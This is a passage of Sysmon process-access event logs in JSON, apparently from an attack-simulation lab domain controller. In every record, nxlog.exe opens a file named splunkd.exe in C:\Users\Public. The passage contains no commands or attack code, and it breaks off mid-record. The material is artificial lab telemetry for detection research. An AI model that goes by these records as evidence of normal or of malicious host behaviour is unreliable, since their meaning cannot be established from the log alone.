{"EventTime":"2020-08-01 06:54:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4619,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:17.510\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:17.510","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4620,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:18.510\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:18.510","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4621,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:19.511\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:19.511","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4622,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:20.511\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:20.511","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4623,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:21.511\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:21.511","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4624,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:22.512\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:22.512","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4625,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:23.512\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 